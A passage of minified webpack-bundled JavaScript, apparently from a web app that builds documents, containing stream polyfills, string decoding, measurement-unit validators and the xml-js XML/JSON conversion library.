ee=y.allocUnsafe(S>>>0),se=this.head,ve=0;se;)y.prototype.copy.call(se.data,ee,ve),ve+=se.data.length,se=se.next;return ee}},{key:"consume",value:function(S,O){var U;return S<this.head.data.length?(U=this.head.data.slice(0,S),this.head.data=this.head.data.slice(S)):U=S===this.head.data.length?this.shift():O?this._getString(S):this._getBuffer(S),U}},{key:"first",value:function(){return this.head.data}},{key:"_getString",value:function(S){var O=this.head,U=1,K=O.data;for(S-=K.length;O=O.next;){var ee=O.data,se=S>ee.length?ee.length:S;if(K+=se===ee.length?ee:ee.slice(0,S),0==(S-=se)){se===ee.length?(++U,this.head=O.next?O.next:this.tail=null):(this.head=O,O.data=ee.slice(se));break}++U}return this.length-=U,K}},{key:"_getBuffer",value:function(S){var O=y.allocUnsafe(S),U=this.head,K=1;for(U.data.copy(O),S-=U.data.length;U=U.next;){var ee=U.data,se=S>ee.length?ee.length:S;if(ee.copy(O,O.length-S,0,se),0==(S-=se)){se===ee.length?(++K,this.head=U.next?U.next:this.tail=null):(this.head=U,U.data=ee.slice(se));break}++K}return this.length-=K,O}},{key:p,value:function(S,O){return M(this,function(U){for(var K=1;K<arguments.length;K++){var ee=null!=arguments[K]?arguments[K]:{};K%2?g(Object(ee),!0).forEach(function(se){b(U,se,ee[se])}):Object.getOwnPropertyDescriptors?Object.defineProperties(U,Object.getOwnPropertyDescriptors(ee)):g(Object(ee)).forEach(function(se){Object.defineProperty(U,se,Object.getOwnPropertyDescriptor(ee,se))})}return U}({},O,{depth:0,customInspect:!1}))}}],x&&function _(D,w){for(var x=0;x<w.length;x++){var S=w[x];S.enumerable=S.enumerable||!1,S.configurable=!0,"value"in S&&(S.writable=!0),Object.defineProperty(D,S.key,S)}}(D.prototype,x),D}()},1029:(Q,F,E)=>{"use strict";var g=E(4155);function b(M,p){y(M,p),_(M)}function _(M){M._writableState&&!M._writableState.emitClose||M._readableState&&!M._readableState.emitClose||M.emit("close")}function y(M,p){M.emit("error",p)}Q.exports={destroy:function(M,p){var D=this;return this._readableState&&this._readableState.destroyed||this._writableState&&this._writableState.destroyed?(p?p(M):M&&(this._writableState?this._writableState.errorEmitted||(this._writableState.errorEmitted=!0,g.nextTick(y,this,M)):g.nextTick(y,this,M)),this):(this._readableState&&(this._readableState.destroyed=!0),this._writableState&&(this._writableState.destroyed=!0),this._destroy(M||null,function(S){!p&&S?D._writableState?D._writableState.errorEmitted?g.nextTick(_,D):(D._writableState.errorEmitted=!0,g.nextTick(b,D,S)):g.nextTick(b,D,S):p?(g.nextTick(_,D),p(S)):g.nextTick(_,D)}),this)},undestroy:function(){this._readableState&&(this._readableState.destroyed=!1,this._readableState.reading=!1,this._readableState.ended=!1,this._readableState.endEmitted=!1),this._writableState&&(this._writableState.destroyed=!1,this._writableState.ended=!1,this._writableState.ending=!1,this._writableState.finalCalled=!1,this._writableState.prefinished=!1,this._writableState.finished=!1,this._writableState.errorEmitted=!1)},errorOrDestroy:function(M,p){var D=M._readableState,w=M._writableState;D&&D.autoDestroy||w&&w.autoDestroy?M.destroy(p):M.emit("error",p)}}},1086:(Q,F,E)=>{"use strict";var g=E(8106).q.ERR_STREAM_PREMATURE_CLOSE;function b(){}Q.exports=function _(y,M,p){if("function"==typeof M)return _(y,null,M);var le,ye;M||(M={}),le=p||b,ye=!1,p=function(){if(!ye){ye=!0;for(var z=arguments.length,l=new Array(z),f=0;f<z;f++)l[f]=arguments[f];le.apply(this,l)}};var D=M.readable||!1!==M.readable&&y.readable,w=M.writable||!1!==M.writable&&y.writable,x=function(){y.writable||O()},S=y._writableState&&y._writableState.finished,O=function(){w=!1,S=!0,D||p.call(y)},U=y._readableState&&y._readableState.endEmitted,K=function(){D=!1,U=!0,w||p.call(y)},ee=function(le){p.call(y,le)},se=function(){var le;return D&&!U?(y._readableState&&y._readableState.ended||(le=new g),p.call(y,le)):w&&!S?(y._writableState&&y._writableState.ended||(le=new g),p.call(y,le)):void 0},ve=function(){y.req.on("finish",O)};return function(le){return le.setHeader&&"function"==typeof le.abort}(y)?(y.on("complete",O),y.on("abort",se),y.req?ve():y.on("request",ve)):w&&!y._writableState&&(y.on("end",x),y.on("close",x)),y.on("end",K),y.on("finish",O),!1!==M.error&&y.on("error",ee),y.on("close",se),function(){y.removeListener("complete",O),y.removeListener("abort",se),y.removeListener("request",ve),y.req&&y.req.removeListener("finish",O),y.removeListener("end",x),y.removeListener("close",x),y.removeListener("finish",O),y.removeListener("end",K),y.removeListener("error",ee),y.removeListener("close",se)}}},1265:Q=>{Q.exports=function(){throw new Error("Readable.from is not available in the browser")}},6472:(Q,F,E)=>{"use strict";var g,b=E(8106).q,_=b.ERR_MISSING_ARGS,y=b.ERR_STREAM_DESTROYED;function M(S){if(S)throw S}function p(S,O,U,K){var ve,le;ve=K,le=!1,K=function(){le||(le=!0,ve.apply(void 0,arguments))};var ee=!1;S.on("close",function(){ee=!0}),void 0===g&&(g=E(1086)),g(S,{readable:O,writable:U},function(ve){if(ve)return K(ve);ee=!0,K()});var se=!1;return function(ve){if(!ee&&!se)return se=!0,function(le){return le.setHeader&&"function"==typeof le.abort}(S)?S.abort():"function"==typeof S.destroy?S.destroy():void K(ve||new y("pipe"))}}function D(S){S()}function w(S,O){return S.pipe(O)}function x(S){return S.length?"function"!=typeof S[S.length-1]?M:S.pop():M}Q.exports=function(){for(var S=arguments.length,O=new Array(S),U=0;U<S;U++)O[U]=arguments[U];var K,ee=x(O);if(Array.isArray(O[0])&&(O=O[0]),O.length<2)throw new _("streams");var se=O.map(function(ve,le){var ye=le<O.length-1;return p(ve,ye,le>0,function(z){K||(K=z),z&&se.forEach(D),ye||(se.forEach(D),ee(K))})});return O.reduce(w)}},94:(Q,F,E)=>{"use strict";var g=E(8106).q.ERR_INVALID_OPT_VALUE;Q.exports={getHighWaterMark:function(b,_,y,M){var D,p=null!=(D=_).highWaterMark?D.highWaterMark:M?D[y]:null;if(null!=p){if(!isFinite(p)||Math.floor(p)!==p||p<0)throw new g(M?y:"highWaterMark",p);return Math.floor(p)}return b.objectMode?16:16384}}},3194:(Q,F,E)=>{Q.exports=E(7187).EventEmitter},2553:(Q,F,E)=>{"use strict";var g=E(9509).Buffer,b=g.isEncoding||function(U){switch((U=""+U)&&U.toLowerCase()){case"hex":case"utf8":case"utf-8":case"ascii":case"binary":case"base64":case"ucs2":case"ucs-2":case"utf16le":case"utf-16le":case"raw":return!0;default:return!1}};function _(U){var K;switch(this.encoding=function(ee){var se=function(ve){if(!ve)return"utf8";for(var le;;)switch(ve){case"utf8":case"utf-8":return"utf8";case"ucs2":case"ucs-2":case"utf16le":case"utf-16le":return"utf16le";case"latin1":case"binary":return"latin1";case"base64":case"ascii":case"hex":return ve;default:if(le)return;ve=(""+ve).toLowerCase(),le=!0}}(ee);if("string"!=typeof se&&(g.isEncoding===b||!b(ee)))throw new Error("Unknown encoding: "+ee);return se||ee}(U),this.encoding){case"utf16le":this.text=p,this.end=D,K=4;break;case"utf8":this.fillLast=M,K=4;break;case"base64":this.text=w,this.end=x,K=3;break;default:return this.write=S,void(this.end=O)}this.lastNeed=0,this.lastTotal=0,this.lastChar=g.allocUnsafe(K)}function y(U){return U<=127?0:U>>5==6?2:U>>4==14?3:U>>3==30?4:U>>6==2?-1:-2}function M(U){var K=this.lastTotal-this.lastNeed,ee=function(se,ve,le){if(128!=(192&ve[0]))return se.lastNeed=0,"\ufffd";if(se.lastNeed>1&&ve.length>1){if(128!=(192&ve[1]))return se.lastNeed=1,"\ufffd";if(se.lastNeed>2&&ve.length>2&&128!=(192&ve[2]))return se.lastNeed=2,"\ufffd"}}(this,U);return void 0!==ee?ee:this.lastNeed<=U.length?(U.copy(this.lastChar,K,0,this.lastNeed),this.lastChar.toString(this.encoding,0,this.lastTotal)):(U.copy(this.lastChar,K,0,U.length),void(this.lastNeed-=U.length))}function p(U,K){if((U.length-K)%2==0){var ee=U.toString("utf16le",K);if(ee){var se=ee.charCodeAt(ee.length-1);if(se>=55296&&se<=56319)return this.lastNeed=2,this.lastTotal=4,this.lastChar[0]=U[U.length-2],this.lastChar[1]=U[U.length-1],ee.slice(0,-1)}return ee}return this.lastNeed=1,this.lastTotal=2,this.lastChar[0]=U[U.length-1],U.toString("utf16le",K,U.length-1)}function D(U){var K=U&&U.length?this.write(U):"";return this.lastNeed?K+this.lastChar.toString("utf16le",0,this.lastTotal-this.lastNeed):K}function w(U,K){var ee=(U.length-K)%3;return 0===ee?U.toString("base64",K):(this.lastNeed=3-ee,this.lastTotal=3,1===ee?this.lastChar[0]=U[U.length-1]:(this.lastChar[0]=U[U.length-2],this.lastChar[1]=U[U.length-1]),U.toString("base64",K,U.length-ee))}function x(U){var K=U&&U.length?this.write(U):"";return this.lastNeed?K+this.lastChar.toString("base64",0,3-this.lastNeed):K}function S(U){return U.toString(this.encoding)}function O(U){return U&&U.length?this.write(U):""}F.s=_,_.prototype.write=function(U){if(0===U.length)return"";var K,ee;if(this.lastNeed){if(void 0===(K=this.fillLast(U)))return"";ee=this.lastNeed,this.lastNeed=0}else ee=0;return ee<U.length?K?K+this.text(U,ee):this.text(U,ee):K||""},_.prototype.end=function(U){var K=U&&U.length?this.write(U):"";return this.lastNeed?K+"\ufffd":K},_.prototype.text=function(U,K){var ee=function(ve,le,ye){var z=le.length-1;if(z<ye)return 0;var l=y(le[z]);return l>=0?(l>0&&(ve.lastNeed=l-1),l):--z<ye||-2===l?0:(l=y(le[z]))>=0?(l>0&&(ve.lastNeed=l-2),l):--z<ye||-2===l?0:(l=y(le[z]))>=0?(l>0&&(2===l?l=0:ve.lastNeed=l-3),l):0}(this,U,K);if(!this.lastNeed)return U.toString("utf8",K);this.lastTotal=ee;var se=U.length-(ee-this.lastNeed);return U.copy(this.lastChar,0,se),U.toString("utf8",K,se)},_.prototype.fillLast=function(U){if(this.lastNeed<=U.length)return U.copy(this.lastChar,this.lastTotal-this.lastNeed,0,this.lastNeed),this.lastChar.toString(this.encoding,0,this.lastTotal);U.copy(this.lastChar,this.lastTotal-this.lastNeed,0,U.length),this.lastNeed-=U.length}},5457:(Q,F,E)=>{"use strict";E.d(F,{vw:()=>_,rq:()=>b,EL:()=>M,NY:()=>y});let g=0;const b=p=>Math.floor(p/25.4*72*20),_=p=>Math.floor(72*p*20),y=()=>++g,M=()=>((p=21)=>{let D="",w=p;for(;w--;)D+="useandom-26T198340PX75pxJACKVERYMINDBUSHWOLF_GQZbfghjklqvwyzrict"[64*Math.random()|0];return D})().toLowerCase()},5575:(Q,F,E)=>{"use strict";E.r(F),E.d(F,{convertInchesToTwip:()=>g.vw,convertMillimetersToTwip:()=>g.rq,dateTimeValue:()=>b.sF,decimalNumber:()=>b.vH,eighthPointMeasureValue:()=>b.LV,hexColorValue:()=>b.dg,hpsMeasureValue:()=>b.KR,longHexNumber:()=>b.mA,measurementOrPercentValue:()=>b.aB,percentageValue:()=>b.wp,pointMeasureValue:()=>b.gg,positiveUniversalMeasureValue:()=>b._p,shortHexNumber:()=>b.G0,signedHpsMeasureValue:()=>b.Rg,signedTwipsMeasureValue:()=>b.xb,twipsMeasureValue:()=>b.Jd,uCharHexNumber:()=>b.xD,uniqueId:()=>g.EL,uniqueNumericId:()=>g.NY,universalMeasureValue:()=>b.KC,unsignedDecimalNumber:()=>b.f$});var g=E(5457),b=E(6595)},6595:(Q,F,E)=>{"use strict";E.d(F,{G0:()=>M,Jd:()=>ee,KC:()=>D,KR:()=>U,LV:()=>le,Rg:()=>K,_p:()=>x,aB:()=>ve,dg:()=>S,f$:()=>b,gg:()=>ye,mA:()=>y,sF:()=>z,vH:()=>g,wp:()=>se,xD:()=>p,xb:()=>O});const g=l=>{if(isNaN(l))throw new Error(`Invalid value '${l}' specified. Must be an integer.`);return Math.floor(l)},b=l=>{const f=g(l);if(f<0)throw new Error(`Invalid value '${l}' specified. Must be a positive integer.`);return f},_=(l,f)=>{const A=2*f;if(l.length!==A||isNaN(Number(`0x${l}`)))throw new Error(`Invalid hex value '${l}'. Expected ${A} digit hex value`);return l},y=l=>_(l,4),M=l=>_(l,2),p=l=>_(l,1),D=l=>{const f=l.slice(-2);if(!w.includes(f))throw new Error(`Invalid unit '${f}' specified. Valid units are ${w.join(", ")}`);const A=l.substring(0,l.length-2);if(isNaN(Number(A)))throw new Error(`Invalid value '${A}' specified. Expected a valid number.`);return`${Number(A)}${f}`},w=["mm","cm","in","pt","pc","pi"],x=l=>{const f=D(l);if(parseFloat(f)<0)throw new Error(`Invalid value '${f}' specified. Expected a positive number.`);return f},S=l=>{if("auto"===l)return l;const f="#"===l.charAt(0)?l.substring(1):l;return _(f,3)},O=l=>"string"==typeof l?D(l):g(l),U=l=>"string"==typeof l?x(l):b(l),K=l=>"string"==typeof l?D(l):g(l),ee=l=>"string"==typeof l?x(l):b(l),se=l=>{if("%"!==l.slice(-1))throw new Error(`Invalid value '${l}'. Expected percentage value (eg '55%')`);const f=l.substring(0,l.length-1);if(isNaN(Number(f)))throw new Error(`Invalid value '${f}' specified. Expected a valid number.`);return`${Number(f)}%`},ve=l=>"number"==typeof l?g(l):"%"===l.slice(-1)?se(l):D(l),le=b,ye=b,z=l=>l.toISOString()},4927:(Q,F,E)=>{function g(b){try{if(!E.g.localStorage)return!1}catch(y){return!1}var _=E.g.localStorage[b];return null!=_&&"true"===String(_).toLowerCase()}Q.exports=function(b,_){if(g("noDeprecation"))return b;var y=!1;return function(){if(!y){if(g("throwDeprecation"))throw new Error(_);g("traceDeprecation")?console.trace(_):console.warn(_),y=!0}return b.apply(this,arguments)}}},9881:Q=>{Q.exports={isArray:function(F){return Array.isArray?Array.isArray(F):"[object Array]"===Object.prototype.toString.call(F)}}},7888:(Q,F,E)=>{var g=E(1229),b=E(1388),_=E(6501),y=E(4673);Q.exports={xml2js:g,xml2json:b,js2xml:_,json2xml:y}},6501:(Q,F,E)=>{var g,b,_=E(4740),y=E(9881).isArray;function M(le,ye,z){return(!z&&le.spaces?"\n":"")+Array(ye+1).join(le.spaces)}function p(le,ye,z){if(ye.ignoreAttributes)return"";"attributesFn"in ye&&(le=ye.attributesFn(le,b,g));var l,f,A,v,P=[];for(l in le)le.hasOwnProperty(l)&&null!=le[l]&&(v=ye.noQuotesForNativeAttributes&&"string"!=typeof le[l]?"":'"',f=(f=""+le[l]).replace(/"/g,"&quot;"),A="attributeNameFn"in ye?ye.attributeNameFn(l,f,b,g):l,P.push(ye.spaces&&ye.indentAttributes?M(ye,z+1,!1):" "),P.push(A+"="+v+("attributeValueFn"in ye?ye.attributeValueFn(f,l,b,g):f)+v));return le&&Object.keys(le).length&&ye.spaces&&ye.indentAttributes&&P.push(M(ye,z,!1)),P.join("")}function D(le,ye,z){return g=le,b="xml",ye.ignoreDeclaration?"":"<?xml"+p(le[ye.attributesKey],ye,z)+"?>"}function w(le,ye,z){if(ye.ignoreInstruction)return"";var l;for(l in le)if(le.hasOwnProperty(l))break;var f="instructionNameFn"in ye?ye.instructionNameFn(l,le[l],b,g):l;if("object"==typeof le[l])return g=le,b=f,"<?"+f+p(le[l][ye.attributesKey],ye,z)+"?>";var A=le[l]?le[l]:"";return"instructionFn"in ye&&(A=ye.instructionFn(A,l,b,g)),"<?"+f+(A?" "+A:"")+"?>"}function x(le,ye){return ye.ignoreComment?"":"\x3c!--"+("commentFn"in ye?ye.commentFn(le,b,g):le)+"--\x3e"}function S(le,ye){return ye.ignoreCdata?"":"<![CDATA["+("cdataFn"in ye?ye.cdataFn(le,b,g):le.replace("]]>","]]]]><![CDATA[>"))+"]]>"}function O(le,ye){return ye.ignoreDoctype?"":"<!DOCTYPE "+("doctypeFn"in ye?ye.doctypeFn(le,b,g):le)+">"}function U(le,ye){return ye.ignoreText?"":(le=(le=(le=""+le).replace(/&amp;/g,"&")).replace(/&/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;"),"textFn"in ye?ye.textFn(le,b,g):le)}function K(le,ye,z,l){return le.reduce(function(f,A){var v=M(ye,z,l&&!f);switch(A.type){case"element":return f+v+function(G,X,L){g=G,b=G.name;var h=[],R="elementNameFn"in X?X.elementNameFn(G.name,G):G.name;h.push("<"+R),G[X.attributesKey]&&h.push(p(G[X.attributesKey],X,L));var J=G[X.elementsKey]&&G[X.elementsKey].length||G[X.attributesKey]&&"preserve"===G[X.attributesKey]["xml:space"];return J||(J="fullTagEmptyElementFn"in X?X.fullTagEmptyElementFn(G.name,G):X.fullTagEmptyElement),J?(h.push(">"),G[X.elementsKey]&&G[X.elementsKey].length&&(h.push(K(G[X.elementsKey],X,L+1)),g=G,b=G.name),h.push(X.spaces&&function(Z,ue){var Ie;if(Z.elements&&Z.elements.length)for(Ie=0;Ie<Z.elements.length;++Ie)switch(Z.elements[Ie][ue.typeKey]){case"text":if(ue.indentText)return!0;break;case"cdata":if(ue.indentCdata)return!0;break;case"instruction":if(ue.indentInstruction)return!0;break;default:return!0}return!1}(G,X)?"\n"+Array(L+1).join(X.spaces):""),h.push("</"+R+">")):h.push("/>"),h.join("")}(A,ye,z);case"comment":return f+v+x(A[ye.commentKey],ye);case"doctype":return f+v+O(A[ye.doctypeKey],ye);case"cdata":return f+(ye.indentCdata?v:"")+S(A[ye.cdataKey],ye);case"text":return f+(ye.indentText?v:"")+U(A[ye.textKey],ye);case"instruction":var P={};return P[A[ye.nameKey]]=A[ye.attributesKey]?A:A[ye.instructionKey],f+(ye.indentInstruction?v:"")+w(P,ye,z)}},"")}function ee(le,ye,z){var l;for(l in le)if(le.hasOwnProperty(l))switch(l){case ye.parentKey:case ye.attributesKey:break;case ye.textKey:if(ye.indentText||z)return!0;break;case ye.cdataKey:if(ye.indentCdata||z)return!0;break;case ye.instructionKey:if(ye.indentInstruction||z)return!0;break;default:return!0}return!1}function se(le,ye,z,l,f){g=le,b=ye;var A="elementNameFn"in z?z.elementNameFn(ye,le):ye;if(null==le||""===le)return"fullTagEmptyElementFn"in z&&z.fullTagEmptyElementFn(ye,le)||z.fullTagEmptyElement?"<"+A+"></"+A+">":"<"+A+"/>";var v=[];if(ye){if(v.push("<"+A),"object"!=typeof le)return v.push(">"+U(le,z)+"</"+A+">"),v.join("");le[z.attributesKey]&&v.push(p(le[z.attributesKey],z,l));var P=ee(le,z,!0)||le[z.attributesKey]&&"preserve"===le[z.attributesKey]["xml:space"];if(P||(P="fullTagEmptyElementFn"in z?z.fullTagEmptyElementFn(ye,le):z.fullTagEmptyElement),!P)return v.push("/>"),v.join("");v.push(">")}return v.push(ve(le,z,l+1,!1)),g=le,b=ye,ye&&v.push((f?M(z,l,!1):"")+"</"+A+">"),v.join("")}function ve(le,ye,z,l){var f,A,v,P=[];for(A in le)if(le.hasOwnProperty(A))for(v=y(le[A])?le[A]:[le[A]],f=0;f<v.length;++f){switch(A){case ye.declarationKey:P.push(D(v[f],ye,z));break;case ye.instructionKey:P.push((ye.indentInstruction?M(ye,z,l):"")+w(v[f],ye,z));break;case ye.attributesKey:case ye.parentKey:break;case ye.textKey:P.push((ye.indentText?M(ye,z,l):"")+U(v[f],ye));break;case ye.cdataKey:P.push((ye.indentCdata?M(ye,z,l):"")+S(v[f],ye));break;case ye.doctypeKey:P.push(M(ye,z,l)+O(v[f],ye));break;case ye.commentKey:P.push(M(ye,z,l)+x(v[f],ye));break;default:P.push(M(ye,z,l)+se(v[f],A,ye,z,ee(v[f],ye)))}l=l&&!P.length}return P.join("")}Q.exports=function(le,ye){var f;f=_.copyOptions(ye),_.ensureFlagExists("ignoreDeclaration",f),_.ensureFlagExists("ignoreInstruction",f),_.ensureFlagExists("ignoreAttributes",f),_.ensureFlagExists("ignoreText",f),_.ensureFlagExists("ignoreComment",f),_.ensureFlagExists("ignoreCdata",f),_.ensureFlagExists("ignoreDoctype",f),_.ensureFlagExists("compact",f),_.ensureFlagExists("indentText",f),_.ensureFlagExists("indentCdata",f),_.ensureFlagExists("indentAttributes",f),_.ensureFlagExists("indentInstruction",f),_.ensureFlagExists("fullTagEmptyElement",f),_.ensureFlagExists("noQuotesForNativeAttributes",f),_.ensureSpacesExists(f),"number"==typeof f.spaces&&(f.spaces=Array(f.spaces+1).join(" ")),_.ensureKeyExists("declaration",f),_.ensureKeyExists("instruction",f),_.ensureKeyExists("attributes",f),_.ensureKeyExists("text",f),_.ensureKeyExists("comment",f),_.ensureKeyExists("cdata",f),_.ensureKeyExists("doctype",f),_.ensureKeyExists("type",f),_.ensureKeyExists("name",f),_.ensureKeyExists("elements",f),_.checkFnExists("doctype",f),_.checkFnExists("instruction",f),_.checkFnExists("cdata",f),_.checkFnExists("comment",f),_.checkFnExists("text",f),_.checkFnExists("instructionName",f),_.checkFnExists("elementName",f),_.checkFnExists("attributeName",f),_.checkFnExists("attributeValue",f),_.checkFnExists("attributes",f),_.checkFnExists("fullTagEmptyElement",f);var z=[];return g=le,b="_root_",(ye=f).compact?z.push(ve(le,ye,0,!0)):(le[ye.declarationKey]&&z.push(D(le[ye.declarationKey],ye,0)),le[ye.elementsKey]&&le[ye.elementsKey].length&&z.push(K(le[ye.elementsKey],ye,0,!z.length))),z.join("")}},4673:(Q,F,E)=>{var g=E(6501);Q.exports=function(b,_){b instanceof ie&&(b=b.toString());var y=null;if("string"==typeof b)try{y=JSON.parse(b)}catch(M){throw new Error("The JSON structure is invalid")}else y=b;return g(y,_)}},4740:(Q,F,E)=>{var g=E(9881).isArray;Q.exports={copyOptions:function(b){var _,y={};for(_ in b)b.hasOwnProperty(_)&&(y[_]=b[_]);return y},ensureFlagExists:function(b,_){b in _&&"boolean"==typeof _[b]||(_[b]=!1)},ensureSpacesExists:function(b){(!("spaces"in b)||"number"!=typeof b.spaces&&"string"!=typeof b.spaces)&&(b.spaces=0)},ensureAlwaysArrayExists:function(b){"alwaysArray"in b&&("boolean"==typeof b.alwaysArray||g(b.alwaysArray))||(b.alwaysArray=!1)},ensureKeyExists:function(b,_){b+"Key"in _&&"string"==typeof _[b+"Key"]||(_[b+"Key"]=_.compact?"_"+b:b)},checkFnExists:function(b,_){return b+"Fn"in _}}},1229:(Q,F,E)=>{var g,b,_=E(6099),y=E(4740),M=E(9881).isArray;function p(le){var ye=Number(le);if(!isNaN(ye))return ye;var z=le.toLowerCase();return"true"===z||"false"!==z&&le}function D(le,ye){var z;if(g.compact){if(!b[g[le+"Key"]]&&(M(g.alwaysArray)?-1!==g.alwaysArray.indexOf(g[le+"Key"]):g.alwaysArray)&&(b[g[le+"Key"]]=[]),b[g[le+"Key"]]&&!M(b[g[le+"Key"]])&&(b[g[le+"Key"]]=[b[g[le+"Key"]]]),le+"Fn"in g&&"string"==typeof ye&&(ye=g[le+"Fn"](ye,b)),"instruction"===le&&("instructionFn"in g||"instructionNameFn"in g))for(z in ye)if(ye.hasOwnProperty(z))if("instructionFn"in g)ye[z]=g.instructionFn(ye[z],z,b);else{var l=ye[z];delete ye[z],ye[g.instructionNameFn(z,l,b)]=l}M(b[g[le+"Key"]])?b[g[le+"Key"]].push(ye):b[g[le+"Key"]]=ye}else{b[g.elementsKey]||(b[g.elementsKey]=[]);var f={};if(f[g.typeKey]=le,"instruction"===le){for(z in ye)if(ye.hasOwnProperty(z))break;f[g.nameKey]="instructionNameFn"in g?g.instructionNameFn(z,ye,b):z,g.instructionHasAttributes?(f[g.attributesKey]=ye[z][g.attributesKey],"instructionFn"in g&&(f[g.attributesKey]=g.instructionFn(f[g.attributesKey],z,b))):("instructionFn"in g&&(ye[z]=g.instructionFn(ye[z],z,b)),f[g.instructionKey]=ye[z])}else le+"Fn"in g&&(ye=g[le+"Fn"](ye,b)),f[g[le+"Key"]]=ye;g.addParent&&(f[g.parentKey]=b),b[g.elementsKey].push(f)}}function w(le){var ye;if("attributesFn"in g&&le&&(le=g.attributesFn(le,b)),(g.trim||"attributeValueFn"in g||"attributeNameFn"in g||g.nativeTypeAttributes)&&le)for(ye in le)if(le.hasOwnProperty(ye)&&(g.trim&&(le[ye]=le[ye].trim()),g.nativeTypeAttributes&&(le[ye]=p(le[ye])),"attributeValueFn"in g&&(le[ye]=g.attributeValueFn(le[ye],ye,b)),"attributeNameFn"in g)){var z=le[ye];delete le[ye],le[g.attributeNameFn(ye,le[ye],b)]=z}return le}function x(le){var ye={};if(le.body&&("xml"===le.name.toLowerCase()||g.instructionHasAttributes)){for(var z,l=/([\w:-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|(\w+))\s*/g;null!==(z=l.exec(le.body));)ye[z[1]]=z[2]||z[3]||z[4];ye=w(ye)}if("xml"===le.name.toLowerCase()){if(g.ignoreDeclaration)return;b[g.declarationKey]={},Object.keys(ye).length&&(b[g.declarationKey][g.attributesKey]=ye),g.addParent&&(b[g.declarationKey][g.parentKey]=b)}else{if(g.ignoreInstruction)return;g.trim&&(le.body=le.body.trim());var f={};g.instructionHasAttributes&&Object.keys(ye).length?(f[le.name]={},f[le.name][g.attributesKey]=ye):f[le.name]=le.body,D("instruction",f)}}function S(le,ye){var z;if("object"==typeof le&&(ye=le.attributes,le=le.name),ye=w(ye),"elementNameFn"in g&&(le=g.elementNameFn(le,b)),g.compact){var l;if(z={},!g.ignoreAttributes&&ye&&Object.keys(ye).length)for(l in z[g.attributesKey]={},ye)ye.hasOwnProperty(l)&&(z[g.attributesKey][l]=ye[l]);!(le in b)&&(M(g.alwaysArray)?-1!==g.alwaysArray.indexOf(le):g.alwaysArray)&&(b[le]=[]),b[le]&&!M(b[le])&&(b[le]=[b[le]]),M(b[le])?b[le].push(z):b[le]=z}else b[g.elementsKey]||(b[g.elementsKey]=[]),(z={})[g.typeKey]="element",z[g.nameKey]=le,!g.ignoreAttributes&&ye&&Object.keys(ye).length&&(z[g.attributesKey]=ye),g.alwaysChildren&&(z[g.elementsKey]=[]),b[g.elementsKey].push(z);z[g.parentKey]=b,b=z}function O(le){g.ignoreText||(le.trim()||g.captureSpacesBetweenElements)&&(g.trim&&(le=le.trim()),g.nativeType&&(le=p(le)),g.sanitize&&(le=le.replace(/&/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;")),D("text",le))}function U(le){g.ignoreComment||(g.trim&&(le=le.trim()),D("comment",le))}function K(le){var ye=b[g.parentKey];g.addParent||delete b[g.parentKey],b=ye}function ee(le){g.ignoreCdata||(g.trim&&(le=le.trim()),D("cdata",le))}function se(le){g.ignoreDoctype||(le=le.replace(/^ /,""),g.trim&&(le=le.trim()),D("doctype",le))}function ve(le){le.note=le}Q.exports=function(le,ye){var z=_.parser(!0,{}),l={};if(b=l,g=y.copyOptions(ye),y.ensureFlagExists("ignoreDeclaration",g),y.ensureFlagExists("ignoreInstruction",g),y.ensureFlagExists("ignoreAttributes",g),y.ensureFlagExists("ignoreText",g),y.ensureFlagExists("ignoreComment",g),y.ensureFlagExists("ignoreCdata",g),y.ensureFlagExists("ignoreDoctype",g),y.ensureFlagExists("compact",g),y.ensureFlagExists("alwaysChildren",g),y.ensureFlagExists("addParent",g),y.ensureFlagExists("trim",g),y.ensureFlagExists("nativeType",g),y.ensureFlagExists("nativeTypeAttributes",g),y.ensureFlagExists("sanitize",g),y.ensureFlagExists("instructionHasAttributes",g),y.ensureFlagExists("captureSpacesBetweenElements",g),y.ensureAlwaysArrayExists(g),y.ensureKeyExists("declaration",g),y.ensureKeyExists("instruction",g),y.ensureKeyExists("attributes",g),y.ensureKeyExists("text",g),y.ensureKeyExists("comment",g),y.ensureKeyExists("cdata",g),y.ensureKeyExists("doctype",g),y.ensureKeyExists("type",g),y.ensureKeyExists("name",g),y.ensureKeyExists("elements",g),y.ensureKeyExists("parent",g),y.checkFnExists("doctype",g),y.checkFnExists("instruction",g),y.checkFnExists("cdata",g),y.checkFnExists("comment",g),y.checkFnExists("text",g),y.checkFnExists("instructionName",g),y.checkFnExists("elementName",g),y.checkFnExists("attributeName",g),y.checkFnExists("attributeValue",g),y.checkFnExists("attributes",g),z.opt={strictEntities:!0},z.onopentag=S,z.ontext=O,z.oncomment=U,z.onclosetag=K,z.onerror=ve,z.oncdata=ee,z.ondoctype=se,z.onprocessinginstruction=x,z.write(le).close(),l[g.elementsKey]){var f=l[g.elementsKey];delete l[g.elementsKey],l[g.elementsKey]=f,delete l.text}return l}},1388:(Q,F,E)=>{var g=E(4740),b=E(1229);Q.exports=function(_,y){var M,p,D,x;return x=g.copyOptions(y),g.ensureSpacesExists(x),p=b(_,M=x),D="compact"in M&&M.compact?"_parent":"parent",("addParent"in M&&M.addParent?JSON.stringify(p,function(w,x){return w===D?"_":x},M.spaces):JSON.stringify(p,null,M.spaces)).replace(/\u2028/g,"\\u2028").replace(/\u2029/g,"\\u2029")}},255:Q=>{var F={"&":"&amp;",'"':"&quot;","'":"&apos;","<":"&lt;",">":"&gt;"};Q.exports=function(E){return E&&E.replace?E.replace(/([&"<>'])/g,function(g,b){return F[b]}):E}},3479:(Q,F,E)=>{var g=E(4155),b=E(255),_=E(2830).Stream;function y(p,D,w){w=w||0;var x,S,O=(x=D,new Array(w||0).join(x||"")),U=p;if("object"==typeof p&&(U=p[S=Object.keys(p)[0]])&&U._elem)return U._elem.name=S,U._elem.icount=w,U._elem.indent=D,U._elem.indents=O,U._elem.interrupt=U,U._elem;var K,ee=[],se=[];function ve(le){Object.keys(le).forEach(function(ye){ee.push(ye+'="'+b(le[ye])+'"')})}switch(typeof U){case"object":if(null===U)break;U._attr&&ve(U._attr),U._cdata&&se.push(("<![CDATA["+U._cdata).replace(/\]\]>/g,"]]]]><![CDATA[>")+"]]>"),U.forEach&&(K=!1,se.push(""),U.forEach(function(le){"object"==typeof 